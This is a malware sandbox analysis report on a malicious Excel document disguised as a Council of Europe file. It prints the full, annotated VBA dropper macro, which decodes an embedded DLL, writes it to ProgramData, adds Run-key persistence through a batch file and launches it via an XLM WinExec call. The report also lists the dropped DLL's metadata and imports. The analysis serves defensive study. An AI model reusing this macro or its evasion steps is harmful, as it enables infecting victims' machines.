VTI SCORE: 95/100
Dynamic Analysis Report
Classification:
Keylogger
Dropper
Threat Names: -
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\Council-of-Europe-.xls Sample File Excel Document
Malicious
Mime Type application/vnd.ms-excel
File Size 1.71 MB
MD5 c89eb0682aa568b8f3d8e5cde23e1fed
SHA1 35463c4d947f4a275416b22dd6a271fd0c99d94e
SHA256 5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7
SSDeep 12288:P8RFy14R0yPXfaVhf8xUAuoTf4suMg5dBvPeiA7hJdf9NudvZt0dzzs97Z7KPMme:x4RO (truncated in the report view)
ImpHash -
Office Information
Create Time 2015-06-05 18:17:20+00:00
Modify Time 2020-04-07 07:54:22+00:00
Document Information
Codepage ANSI_Latin1
Application Microsoft Excel
App Version 15.0
Document Security NONE
Titles Of Parts Sheet1, Sheet2
scale_crop False
shared_doc False
Controls (1)
CLSID Control Name Associated Vulnerability
{00020820-0000-0000-C000-000000000046} Excel97Sheet -
VBA Macros (2)
Macro #1: Module1
Attribute VB_Name = "Module1"
' Empty procedure in Module1. It is never called from ThisWorkbook and does
' nothing; presumably filler so the module is not empty. All of the dropper
' logic lives in ThisWorkbook.Workbook_Open.
Sub sa()

End Sub
Macro #2: ThisWorkbook
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' String de-obfuscation helper used throughout ThisWorkbook.
' h: space-separated two-digit hex byte values, e.g. "43 41 4c 4c".
' Returns the bytes converted to characters with Chr() ("43 41 4c 4c" -> "CALL").
' Every file path, API name and command line in Workbook_Open is stored in this
' form so that the cleartext strings never appear in the module source.
Function SZpmrPBsT(h)
  Dim a: a = Split(h)          ' split on spaces into hex tokens
  Dim i
  For i = 0 To UBound(a)
      a(i) = Chr("&H" & a(i))  ' "&H43" -> 67 -> "C"
  Next
  h2s = Join(a, "")            ' h2s is implicit (module has no Option Explicit)
  SZpmrPBsT = h2s
End Function

' Auto-runs when the workbook is opened with macros enabled; this is the
' dropper's entry point. In order it:
'   1. reads an encoded payload from Sheet2!A1:A70,
'   2. decodes it (running-key subtraction via xoAOvMNPSVo, then base64 via
'      hMqirSfTAmm),
'   3. writes the result to C:\ProgramData\DataExchange.dll,
'   4. writes C:\ProgramData\tt.bat containing a REG ADD that installs an HKCU
'      Run value launching "rundll32.exe C:\ProgramData\DataExchange.dll,Start",
'   5. runs tt.bat and then the DLL itself, both through the Excel 4.0 (XLM)
'      CALL function into Kernel32!WinExec instead of VBA Shell()/WScript.Shell
'      (presumably to sidestep detections keyed on those VBA APIs).
' Every path, API name and command is hex-encoded and decoded at run time with
' SZpmrPBsT(); the decoded values are given in the comments below.
Sub Workbook_Open()
    mykk = "qnZeVsoOpmeN"   ' 12-character key for xoAOvMNPSVo(); not a password
    Dim g
    ' d is assigned three times in this Sub and never read: decoy "login"
    ' strings that make the macro look like a password check to a casual reader.
    d = "MsgBox ('Invalid User and Passwdord')"
    Dim AC
    ' Concatenate Sheet2!A1..A70 into AC, stopping at the first empty cell.
    ' The cells carry the encoded payload as comma-separated hex byte values
    ' (xoAOvMNPSVo splits the result on ",").
    For i = 1 To 70
        Celles = "A" + CStr(i)
        A1 = ThisWorkbook.Sheets("Sheet2").Range(Celles).Value
        If A1 = "" Then
            Exit For
        End If
        AC = AC + A1
    Next i
    Dim o
    d = "MsgBox ('Please login')"
    Set Ofile = CreateObject("Scripting.FileSystemObject")
    o = xoAOvMNPSVo(mykk, AC)   ' stage 1: subtraction cipher -> base64 text
    Dim dd
    ' dd = "C:\ProgramData\DataExchange.dll" (presumably chosen because it can be
    ' written without elevation). The dropped file (see "Dropped File" below) is a
    ' 32-bit DLL with a single export, Start.
    dd = SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c")
    lkd = hMqirSfTAmm(o)        ' stage 2: base64 decode -> PE image as a string
    ' The PE is written through a text-mode FSO stream: WriteLine appends CR LF
    ' and the last decoded byte is trimmed (Len - 1). NOTE(review): why one byte
    ' is dropped here (hMqirSfTAmm also drops one input char) is not explained
    ' by the code; compare against the dropped file's hash/size if it matters.
    Set WText = Ofile.CreateTextFile(dd)
    WText.WriteLine Left(lkd, Len(lkd) - 1)
    WText.Close
    Dim func
    func = SZpmrPBsT("43 41 4c 4c")              ' "CALL"   (XLM function)
    Dim lib
    lib = SZpmrPBsT("4b 65 72 6e 65 6c 33 32")    ' "Kernel32"
    Dim ok
    ok = SZpmrPBsT("57 69 6e 45 78 65 63")        ' "WinExec"
    Dim go
    Dim goo
    ' goo = REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AutoStart
    '       /t REG_SZ /d "rundll32.exe C:\ProgramData\DataExchange.dll,Start"
    ' i.e. per-user persistence (no admin rights needed); "Start" matches the
    ' DLL's only export listed in the report.
    goo = SZpmrPBsT("52 45 47 20 41 44 44 20 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 20 2f 76 20 41 75 74 6f 53 74 61 72 74 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74 22")
    ' Written to "C:\ProgramData\tt.bat" (the 139-byte batch file in the report).
    Set WText = Ofile.CreateTextFile(SZpmrPBsT("43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74"))
    WText.WriteLine goo
    WText.Close
    Dim lets
    lets = SZpmrPBsT("63 6d 64 2e 65 78 65 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 74 74 2e 62 61 74")   ' "cmd.exe /c C:\ProgramData\tt.bat"
    ' Builds and executes the XLM formula
    '   CALL("Kernel32", "WinExec", "JCCJ", "cmd.exe /c C:\ProgramData\tt.bat", 0)
    ' "JCCJ" appears to be the CALL type-text (J = 32-bit integer, C = C string);
    ' the trailing 0 is WinExec's uCmdShow (0 = SW_HIDE, no visible window).
    ' NOTE(review): the type-text declares one more argument than is passed; the
    ' report does not show whether this call actually succeeded in the sandbox.
    Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", lets)
    ' go = "powershell Start-Process rundll32.exe C:\ProgramData\DataExchange.dll,Start"
    go = SZpmrPBsT("70 6f 77 65 72 73 68 65 6c 6c 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 44 61 74 61 45 78 63 68 61 6e 67 65 2e 64 6c 6c 2c 53 74 61 72 74")
    ' Same WinExec trampoline, now launching the dropped DLL immediately rather
    ' than waiting for the next logon.
    Application.ExecuteExcel4Macro Replace(Replace(Replace(Replace("{{}}(""[]"", ""{^}"", ""JCCJ"", ""[*]"", 0)", "{{}}", func), "[]", lib), "{^}", ok), "[*]", go)
    d = "MsgBox ('This is a valid password.')"   ' dead assignment; nothing is displayed

End Sub

' Stage-1 decoder for the Sheet2 payload: a running-key subtraction cipher.
' yy : key string (Workbook_Open passes mykk = "qnZeVsoOpmeN"); cycled one
'      character at a time.
' msg: comma-separated hex byte values, each optionally prefixed with "0x".
' Returns a string in which each value has had the character code of the
' corresponding key character subtracted from it. Workbook_Open hands the result
' to hMqirSfTAmm, so the output is expected to be base64 text.
Function xoAOvMNPSVo(yy, msg)
    Dim outre
    Dim intCoun                      ' index into yy; starts as Empty (0)
    a = Split(msg, ",")
    msg_len = UBound(a)
    Dim x
    For x = 0 To msg_len
        key_a = Mid(yy, intCoun + 1, 1)
        ' Wrap the key index once it has walked past the last key character.
        If intCoun = Len(yy) Then
            intCoun = 0
            key_a = Mid(yy, intCoun + 1, 1)
        End If
        intCoun = intCoun + 1
        Dim ll
        ll = CInt("&H" & Replace(a(x), "0x", ""))   ' hex token -> 0..255
        ' VBA's Mod binds tighter than "-", so this is ll - ((Asc + 256) Mod 256),
        ' i.e. simply ll - Asc(key_a). There is no wrap-around on the result, so
        ' an input byte smaller than its key byte would make Chr() fail.
        fg = ll - (Asc(key_a) + 256) Mod 256
        gdd_a = Chr(fg)
        outre = outre + gdd_a
    Next
    xoAOvMNPSVo = outre
End Function

' Stage-2 decoder: a hand-rolled base64 decoder (presumably to avoid the
' MSXML/ADODB COM objects a standard VBA base64 routine would instantiate).
' ss: base64 text. The LAST character is discarded before decoding.
' Returns the decoded bytes as a VBA string, one character per byte; "="
' padding reduces the number of bytes emitted for the final group.
' brt is the standard alphabet "A-Za-z0-9+/", itself stored hex-encoded.
' There is no whitespace or invalid-character handling: a character missing
' from brt yields InStr = 0 and therefore Pp = -1, silently corrupting the group.
Function hMqirSfTAmm(ss)
        brt = SZpmrPBsT("41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f")   ' "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
        Dim stringlen, resOut, grpBegin
        stringlen = Len(ss) - 1
        newstring = Left(ss, stringlen)   ' drop the trailing character
        For grpBegin = 1 To stringlen Step 4
               Dim numDataBytes, CharCounter, Oo, Pp, nGcount, pOut
               numDataBytes = 3          ' bytes produced by a full 4-char group
               nGcount = 0
               For CharCounter = 0 To 3
                   Oo = Mid(newstring, grpBegin + CharCounter, 1)
                   If Oo = "=" Then
                       numDataBytes = numDataBytes - 1
                        Pp = 0
                    Else
                        Pp = InStr(1, brt, Oo, vbBinaryCompare) - 1   ' 0..63
                    End If
                    Dim tr
                    tr = 64 * nGcount     ' pack four 6-bit values into a 24-bit number
                    nGcount = tr + Pp
                Next
           nGcount = Hex(nGcount)
           Dim ds
           ds = String(6 - Len(nGcount), "0")   ' left-pad to six hex digits (3 bytes)
           nGcount = ds & nGcount
           Dim po
           po = CByte("&H" & Mid(nGcount, 1, 2))
           pOut = Chr(po)
           pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 3, 2)))
           pOut = pOut + Chr(CByte("&H" & Mid(nGcount, 5, 2)))
           resOut = resOut & Left(pOut, numDataBytes)   ' keep only the real bytes
       Next
       hMqirSfTAmm = resOut
End Function

YARA Matches (1)
Rule Name Rule Description Classification Score Actions
VBA_Create_File VBA macro contains file creation commands; possible dropper -
2/5
C:\ProgramData\DataExchange.dll Dropped File Binary
Unknown
Mime Type application/vnd.microsoft.portable-executable
File Size 235.00 KB
MD5 959e28f5cb3fea8299bf2fe3ec268ebb
SHA1 6c5ff79550fb4c0acc71c3c6da3dc5afe6fea822
SHA256 2361ee9c49fbe2a6302b3b01c1cc5893359ccee2782be42976d9e6f5efb14d84
SSDeep 3072:dLLijkWk0Uj1HxOob/90B7JdNHZUsfLcG+EcskoGmlu6gAg0FubPyyjBnas1UaAB:dmkzkPNys4G+EcsyAOj/jBhiaY
ImpHash 4efff83e30680d340096e552cf53aedc
PE Information
Image Base 0x10000000
Entry Point 0x1000f046
Size Of Code 0x26a00
Size Of Initialized Data 0x14e00
File Type FileType.dll
Subsystem Subsystem.windows_cui
Machine Type MachineType.i386
Compile Timestamp 2020-04-06 11:07:00+00:00
Sections (6)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x10001000 0x26813 0x26a00 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.62
.rdata 0x10028000 0xf3c6 0xf400 0x26e00 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.63
.data 0x10038000 0x1d28 0xe00 0x36200 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.72
.tls 0x1003a000 0x13a5 0x1400 0x37000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 0.0
.rsrc 0x1003c000 0x1e0 0x200 0x38400 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.72
.reloc 0x1003d000 0x24d8 0x2600 0x38600 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ 6.5
Imports (6)
KERNEL32.dll (82)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreatePipe 0x0 0x10028018 0x36b64 0x35964 0xda
PeekNamedPipe 0x0 0x1002801c 0x36b68 0x35968 0x413
MultiByteToWideChar 0x0 0x10028020 0x36b6c 0x3596c 0x3e0
CloseHandle 0x0 0x10028024 0x36b70 0x35970 0x84
CreateProcessW 0x0 0x10028028 0x36b74 0x35974 0xe2
WriteFile 0x0 0x1002802c 0x36b78 0x35978 0x5fc
CreateFileW 0x0 0x10028030 0x36b7c 0x3597c 0xc8
WideCharToMultiByte 0x0 0x10028034 0x36b80 0x35980 0x5e8
ReadFile 0x0 0x10028038 0x36b84 0x35984 0x463
GetComputerNameW 0x0 0x1002803c 0x36b88 0x35988 0x1da
GetVersion 0x0 0x10028040 0x36b8c 0x3598c 0x30f
FlushFileBuffers 0x0 0x10028044 0x36b90 0x35990 0x19a
SetFilePointerEx 0x0 0x10028048 0x36b94 0x35994 0x512
GetConsoleMode 0x0 0x1002804c 0x36b98 0x35998 0x1f7
GetConsoleCP 0x0 0x10028050 0x36b9c 0x3599c 0x1e5
HeapSize 0x0 0x10028054 0x36ba0 0x359a0 0x344
SetStdHandle 0x0 0x10028058 0x36ba4 0x359a4 0x539
Sleep 0x0 0x1002805c 0x36ba8 0x359a8 0x56a
VirtualAlloc 0x0 0x10028060 0x36bac 0x359ac 0x5b3
FreeEnvironmentStringsW 0x0 0x10028064 0x36bb0 0x359b0 0x1a5
GetEnvironmentStringsW 0x0 0x10028068 0x36bb4 0x359b4 0x230
GetCommandLineW 0x0 0x1002806c 0x36bb8 0x359b8 0x1d2
WriteConsoleW 0x0 0x10028070 0x36bbc 0x359bc 0x5fb
VirtualFree 0x0 0x10028074 0x36bc0 0x359c0 0x5b6
EnterCriticalSection 0x0 0x10028078 0x36bc4 0x359c4 0x12d
LeaveCriticalSection 0x0 0x1002807c 0x36bc8 0x359c8 0x3b0
DeleteCriticalSection 0x0 0x10028080 0x36bcc 0x359cc 0x10c
EncodePointer 0x0 0x10028084 0x36bd0 0x359d0 0x129
DecodePointer 0x0 0x10028088 0x36bd4 0x359d4 0x105
SetLastError 0x0 0x1002808c 0x36bd8 0x359d8 0x521
InitializeCriticalSectionAndSpinCount 0x0 0x10028090 0x36bdc 0x359dc 0x354
CreateEventW 0x0 0x10028094 0x36be0 0x359e0 0xbc
TlsAlloc 0x0 0x10028098 0x36be4 0x359e4 0x58b
TlsGetValue 0x0 0x1002809c 0x36be8 0x359e8 0x58d
TlsSetValue 0x0 0x100280a0 0x36bec 0x359ec 0x58e
TlsFree 0x0 0x100280a4 0x36bf0 0x359f0 0x58c
GetSystemTimeAsFileTime 0x0 0x100280a8 0x36bf4 0x359f4 0x2e1
GetModuleHandleW 0x0 0x100280ac 0x36bf8 0x359f8 0x270
GetProcAddress 0x0 0x100280b0 0x36bfc 0x359fc 0x2a6
LCMapStringW 0x0 0x100280b4 0x36c00 0x35a00 0x3a4
GetLocaleInfoW 0x0 0x100280b8 0x36c04 0x35a04 0x25d
GetStringTypeW 0x0 0x100280bc 0x36c08 0x35a08 0x2cf
GetCPInfo 0x0 0x100280c0 0x36c0c 0x35a0c 0x1bc
SetEvent 0x0 0x100280c4 0x36c10 0x35a10 0x505
ResetEvent 0x0 0x100280c8 0x36c14 0x35a14 0x4b6
WaitForSingleObjectEx 0x0 0x100280cc 0x36c18 0x35a18 0x5c5
UnhandledExceptionFilter 0x0 0x100280d0 0x36c1c 0x35a1c 0x59a
SetUnhandledExceptionFilter 0x0 0x100280d4 0x36c20 0x35a20 0x55b
GetCurrentProcess 0x0 0x100280d8 0x36c24 0x35a24 0x212
TerminateProcess 0x0 0x100280dc 0x36c28 0x35a28 0x579
IsProcessorFeaturePresent 0x0 0x100280e0 0x36c2c 0x35a2c 0x37b
IsDebuggerPresent 0x0 0x100280e4 0x36c30 0x35a30 0x374
GetStartupInfoW 0x0 0x100280e8 0x36c34 0x35a34 0x2c8
QueryPerformanceCounter 0x0 0x100280ec 0x36c38 0x35a38 0x43e
GetCurrentProcessId 0x0 0x100280f0 0x36c3c 0x35a3c 0x213
GetCurrentThreadId 0x0 0x100280f4 0x36c40 0x35a40 0x217
InitializeSListHead 0x0 0x100280f8 0x36c44 0x35a44 0x358
RtlUnwind 0x0 0x100280fc 0x36c48 0x35a48 0x4c2
RaiseException 0x0 0x10028100 0x36c4c 0x35a4c 0x453
GetLastError 0x0 0x10028104 0x36c50 0x35a50 0x259
FreeLibrary 0x0 0x10028108 0x36c54 0x35a54 0x1a6
LoadLibraryExW 0x0 0x1002810c 0x36c58 0x35a58 0x3b6
InterlockedFlushSList 0x0 0x10028110 0x36c5c 0x35a5c 0x361
HeapAlloc 0x0 0x10028114 0x36c60 0x35a60 0x33b
HeapReAlloc 0x0 0x10028118 0x36c64 0x35a64 0x342
HeapFree 0x0 0x1002811c 0x36c68 0x35a68 0x33f
ExitProcess 0x0 0x10028120 0x36c6c 0x35a6c 0x159
GetModuleHandleExW 0x0 0x10028124 0x36c70 0x35a70 0x26f
GetModuleFileNameA 0x0 0x10028128 0x36c74 0x35a74 0x26b
GetACP 0x0 0x1002812c 0x36c78 0x35a78 0x1ad
GetStdHandle 0x0 0x10028130 0x36c7c 0x35a7c 0x2ca
GetFileType 0x0 0x10028134 0x36c80 0x35a80 0x247
IsValidLocale 0x0 0x10028138 0x36c84 0x35a84 0x382
GetUserDefaultLCID 0x0 0x1002813c 0x36c88 0x35a88 0x308
EnumSystemLocalesW 0x0 0x10028140 0x36c8c 0x35a8c 0x14f
GetProcessHeap 0x0 0x10028144 0x36c90 0x35a90 0x2ac
FindClose 0x0 0x10028148 0x36c94 0x35a94 0x170
FindFirstFileExA 0x0 0x1002814c 0x36c98 0x35a98 0x175
FindNextFileA 0x0 0x10028150 0x36c9c 0x35a9c 0x185
IsValidCodePage 0x0 0x10028154 0x36ca0 0x35aa0 0x380
GetOEMCP 0x0 0x10028158 0x36ca4 0x35aa4 0x28f
GetCommandLineA 0x0 0x1002815c 0x36ca8 0x35aa8 0x1d1
USER32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
wsprintfW 0x0 0x10028164 0x36cb0 0x35ab0 0x3ac
ADVAPI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetUserNameA 0x0 0x10028000 0x36b4c 0x3594c 0x179
bcrypt.dll (7)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
BCryptHashData 0x0 0x1002816c 0x36cb8 0x35ab8 0x23
BCryptFinishHash 0x0 0x10028170 0x36cbc 0x35abc 0x1b
BCryptOpenAlgorithmProvider 0x0 0x10028174 0x36cc0 0x35ac0 0x27
BCryptGetProperty 0x0 0x10028178 0x36cc4 0x35ac4 0x21
BCryptCreateHash 0x0 0x1002817c 0x36cc8 0x35ac8 0x6
BCryptCloseAlgorithmProvider 0x0 0x10028180 0x36ccc 0x35acc 0x2
BCryptDestroyHash 0x0 0x10028184 0x36cd0 0x35ad0 0xd
DNSAPI.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
DnsQuery_A 0x0 0x10028008 0x36b54 0x35954 0x5f
IPHLPAPI.DLL (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetAdaptersInfo 0x0 0x10028010 0x36b5c 0x3595c 0x40
Exports (1)
Api name EAT Address Ordinal
Start 0x63b0 0x1
C:\ProgramData\tt.bat Dropped File Batch
Unknown
Mime Type application/x-bat
File Size 139 Bytes
MD5 36dc19d145b4b39a24150055080e47bf
SHA1 e02effb961a3e9d8994f21b008e959045465f03c
SHA256 8f93f7e1f6865e41ae718899718fb4ff9116d5986eb83a7fe6dad54595d4fb02
SSDeep 3:28D9so3KRfyM1K7eDBFaRwRyid4JL4AcfDKCkRERrcKaov:rtuH1jGwUidYkjfao1jv
ImpHash -